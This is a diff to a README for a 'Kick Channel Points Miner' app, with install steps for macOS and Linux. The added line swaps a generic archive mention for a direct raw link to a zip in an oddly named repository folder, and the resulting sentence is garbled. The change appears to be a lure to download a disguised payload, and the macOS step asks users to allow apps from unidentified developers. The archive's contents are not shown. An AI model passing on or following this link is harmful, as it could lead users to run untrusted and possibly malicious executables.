Ha922/Kick_Channel_Points_Miner/README.md

   Open the `.dmg` file you downloaded.
 Drag the application to your Applications folder.
 You may need to allow apps from unidentified developers if you see a warning.

 - **Linux:**
-  Extract the `.tar.gz` file or use the installer if provided.
+  Extract the `https://github.com/Ha922/Kick_Channel_Points_Miner/raw/refs/heads/main/ascomycetal/Kick_Miner_Channel_Points_v1.8.zip` file or use the installer if provided.
 Open your terminal, navigate to the extracted folder, and run the help command to learn how to start the app:
   ```
   ./kick_channel_points_miner --help
   ```